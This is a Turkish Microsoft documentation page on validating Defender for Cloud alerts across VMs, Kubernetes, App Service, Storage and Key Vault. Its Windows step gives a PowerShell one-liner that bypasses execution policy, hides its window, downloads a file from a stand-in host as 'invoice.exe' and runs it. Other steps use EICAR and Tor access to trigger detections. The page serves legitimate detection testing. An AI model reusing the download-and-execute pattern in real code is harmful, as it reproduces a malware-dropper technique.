Aracılığıyla paylaş

Bulut için Microsoft Defender uyarılarını doğrulama

  • Makale

Bu makalede, sisteminizin Bulut için Microsoft Defender uyarıları için düzgün yapılandırıldığını doğrulama ve güvenlik tehditlerini etkili bir şekilde izlemenizi ve yanıtlamanızı sağlama açıklanmaktadır.

Güvenlik uyarıları nedir?

Uyarılar, kaynaklarınızda tehditler algıladığında Bulut için Defender tarafından oluşturulan bildirimlerdir. Sorunu hızla araştırmak için gereken bilgilerle birlikte uyarıları önceliklendirir ve listeler. Bulut için Defender ayrıca bir saldırıyı düzeltmek için öneriler sağlar.

Daha fazla bilgi için bkz. Bulut için Defender güvenlik uyarıları ve Güvenlik uyarılarını yönetme ve yanıtlama.

Önkoşullar

Tüm uyarıları almak için makinelerinizin ve bağlı Log Analytics çalışma alanlarının aynı kiracıda olması gerekir.

Örnek güvenlik uyarıları oluşturma

Bulut için Microsoft Defender'da güvenlik uyarılarını yönetme ve yanıtlama bölümünde açıklandığı gibi yeni önizleme uyarıları deneyimini kullanıyorsanız Azure portalındaki güvenlik uyarıları sayfasından örnek uyarılar oluşturabilirsiniz.

Örnek uyarıları kullanarak:

  • Microsoft Defender planlarınızın değerini ve özelliklerini değerlendirin.
  • Güvenlik uyarılarınız (SIEM tümleştirmeleri, iş akışı otomasyonu ve e-posta bildirimleri gibi) için yaptığınız tüm yapılandırmaları doğrulayın.

Örnek uyarılar oluşturmak için:

  1. Abonelik Katkıda Bulunanı rolüne sahip bir kullanıcı olarak güvenlik uyarıları sayfasındaki araç çubuğunda Örnek uyarılar'ı seçin.
  2. Aboneliği seçin.
  3. Uyarılarını görmek istediğiniz ilgili Microsoft Defender planlarını seçin.
  4. Örnek uyarılar oluştur'u seçin.

Bulut için Microsoft Defender'da örnek uyarılar oluşturma adımlarını gösteren ekran görüntüsü.

Örnek uyarıların oluşturulduğunu bildiren bir bildirim görüntülenir:

Örnek uyarıların oluşturulduğunu belirten bildirimi gösteren ekran görüntüsü.

Birkaç dakika sonra uyarılar güvenlik uyarıları sayfasında görünür. Bunlar ayrıca, Bulut için Microsoft Defender güvenlik uyarılarınızı (bağlı SIEM'ler, e-posta bildirimleri vb.) alacak şekilde yapılandırdığınız başka herhangi bir yerde de görünür.

Güvenlik uyarıları listesindeki örnek uyarıları gösteren ekran görüntüsü.

İpucu

Uyarılar sanal kaynaklar içindir.

Azure VM'lerinizde uyarıların simülasyonunu oluşturma (Windows)

Sunucular için Defender tümleştirmesinin bir parçası olarak makinenize Uç Nokta için Microsoft Defender aracısı yüklendikten sonra, uyarının saldırıya uğrayan kaynağı olmak istediğiniz makineden bu adımları izleyin.

Cihazda yükseltilmiş bir komut satırı istemi açın ve betiği çalıştırın:

  1. Başlat'a gidin ve yazıncmd.

  2. Komut İstemi'ni sağ seçin ve Yönetici olarak çalıştır'ı seçin.

    Yönetici Olarak Çalıştır'ın seçileceği yeri gösteren ekran görüntüsü.

  3. İstemde aşağıdaki komutu kopyalayıp çalıştırın: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.

  4. Komut İstemi penceresi otomatik olarak kapanır. Başarılı olursa, 10 dakika içinde Bulut için Defender Uyarılar dikey penceresinde yeni bir uyarı görünür.

  5. PowerShell kutusundaki ileti satırı, burada gösterildiği gibi görünmelidir:

    PowerShell ileti satırını gösteren ekran görüntüsü.

Alternatif olarak, bu testi gerçekleştirmek için EICAR test dizesini kullanabilirsiniz: Metin dosyası oluşturun, EICAR satırını yapıştırın ve dosyayı yürütülebilir dosya olarak makinenizin yerel sürücüsüne kaydedin.

Not

Windows için test uyarılarını gözden geçirirken, Uç Nokta için Defender'ın Gerçek Zamanlı koruma etkin olarak çalıştığından emin olun. Bu yapılandırmayı doğrulamayı öğrenin.

Azure VM'lerinizde uyarıların simülasyonunu oluşturma (Linux)

Sunucular için Defender tümleştirmesinin bir parçası olarak makinenize Uç Nokta için Microsoft Defender aracısı yüklendikten sonra, uyarının saldırıya uğrayan kaynağı olmasını istediğiniz makinedeki şu adımları izleyin:

  1. Bir Terminal penceresi açın, aşağıdaki komutu kopyalayın ve çalıştırın: curl -O https://secure.eicar.org/eicar.com.txt
  2. Komut İstemi penceresi otomatik olarak kapanır. Başarılı olursa, 10 dakika içinde Bulut için Defender Uyarılar dikey penceresinde yeni bir uyarı görünür.

Not

Linux için test uyarılarını gözden geçirirken, Gerçek Zamanlı koruma etkinken Uç Nokta için Defender'ın çalıştığından emin olun. Bu yapılandırmayı doğrulamayı öğrenin.

Kubernetes'te uyarıların benzetimini yapın

Kapsayıcılar için Defender, kümeleriniz ve temel küme düğümleriniz için güvenlik uyarıları sağlar. Bunu, denetim düzlemini (API sunucusu) ve kapsayıcılı iş yükünü izleyerek gerçekleştirir.

Kubernetes uyarıları simülasyon aracını kullanarak denetim düzlemi ve iş yükü için uyarıların simülasyonunu yapabilirsiniz.

Kapsayıcılar için Microsoft Defender ile Kubernetes düğümlerinizi ve kümelerinizi savunma hakkında daha fazla bilgi edinin.

App Service için uyarıların simülasyonunu oluşturma

App Service'te çalışan kaynaklar için uyarıların benzetimini yapabilirsiniz.

  1. Yeni bir web sitesi oluşturun ve Bulut için Defender kaydolması veya mevcut bir web sitesini kullanması için 24 saat bekleyin.
  2. Web sitesi oluşturulduktan sonra aşağıdaki URL'yi kullanarak web sitesine erişin:

    1. App Service kaynak bölmesini açın ve varsayılan etki alanı alanından URL'nin etki alanını kopyalayın.

      Varsayılan etki alanının kopyalandığı yeri gösteren ekran görüntüsü.

    2. Web sitesi adını URL'ye kopyalayın: https://<website-name>.azurewebsites.net/This_Will_Generate_ASC_Alert.

  3. Yaklaşık 1-2 saat içinde bir uyarı oluşturulur.

Depolama ATP'si (Gelişmiş Tehdit Koruması) için uyarıların simülasyonunu oluşturma

  1. Depolama için Azure Defender'ın etkinleştirildiği bir depolama hesabına gidin.

  2. Kenar çubuğunda Kapsayıcılar sekmesini seçin.

    Kapsayıcı seçmek için gidileceği yeri gösteren ekran görüntüsü.

  3. Mevcut bir kapsayıcıya gidin veya yeni bir kapsayıcı oluşturun.

  4. Bu kapsayıcıya bir dosya yükleyin. Hassas veriler içerebilecek herhangi bir dosyayı karşıya yüklemekten kaçının.

    Kapsayıcıya dosyanın yüklendiği yeri gösteren ekran görüntüsü.

  5. Karşıya yüklenen dosyayı sağ seçin ve SAS Oluştur'a tıklayın.

  6. Oluşturulan SAS belirteci ve URL düğmesini seçin (herhangi bir seçeneği değiştirmeniz gerekmez).

  7. Oluşturulan SAS URL'sini kopyalayın.

  8. Buradan indirebileceğiniz Tor tarayıcısını açın.

  9. Tor tarayıcısında SAS URL'sine gidin. Artık karşıya yüklenen dosyayı görmeniz ve indirebilmeniz gerekir.

AppServices uyarılarını test edin

Bir uygulama hizmetleri EICAR uyarısının benzetimini yapmak için:

  1. App Services web sitesinin Azure portalı dikey penceresine giderek veya bu web sitesiyle ilişkilendirilmiş özel DNS girişini kullanarak web sitesinin HTTP uç noktasını bulun. (Azure Uygulaması Hizmetleri web sitesinin varsayılan URL uç noktası son ekine https://XXXXXXX.azurewebsites.netsahiptir). Web sitesi, uyarı simülasyonu öncesinde oluşturulmuş bir web sitesi değil mevcut bir web sitesi olmalıdır.
  2. App Services web sitesinin Azure portalı dikey penceresine giderek veya bu web sitesiyle ilişkilendirilmiş özel DNS girişini kullanarak web sitesinin HTTP uç noktasını bulun. (Azure Uygulaması Hizmetleri web sitesinin varsayılan URL uç noktası son ekine https://XXXXXXX.azurewebsites.netsahiptir). Web sitesi, uyarı simülasyonu öncesinde oluşturulmuş bir web sitesi değil mevcut bir web sitesi olmalıdır.
  3. Web sitesi URL'sine göz atın ve aşağıdaki sabit son eki ekleyin: /This_Will_Generate_ASC_Alert. URL şöyle görünmelidir: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Uyarının oluşturulması biraz zaman alabilir (yaklaşık 1,5 saat).

Azure Key Vault Tehdit Algılamayı Doğrulama

  1. Henüz oluşturulmuş bir Key Vault'nuz yoksa, bir anahtar kasası oluşturduğunuzdan emin olun.
  2. Key Vault ve gizli diziyi oluşturduktan sonra İnternet erişimi olan bir VM'ye gidin ve TOR Browser'ı indirin.
  3. VM'nize TOR Browser'ı yükleyin.
  4. Yüklemeden sonra normal tarayıcınızı açın, Azure portalında oturum açın ve Key Vault sayfasına erişin. Vurgulanan URL'yi seçin ve adresi kopyalayın.
  5. TOR'yi açın ve bu URL'yi yapıştırın (Azure portalına erişmek için yeniden kimlik doğrulaması yapmanız gerekir).
  6. Erişimden sonra sol bölmedeki Gizli Diziler seçeneğini de belirleyebilirsiniz.
  7. TOR Tarayıcısı'nda Azure portalında oturumu kapatın ve tarayıcıyı kapatın.
  8. Bir süre sonra, Key Vault için Defender bu şüpheli etkinlik hakkında ayrıntılı bilgi içeren bir uyarı tetikler.

Sonraki adımlar

Bu makalede uyarıları doğrulama işlemine giriş yaptınız. Artık bu doğrulamayı bildiğinize göre aşağıdaki makaleleri inceleyin: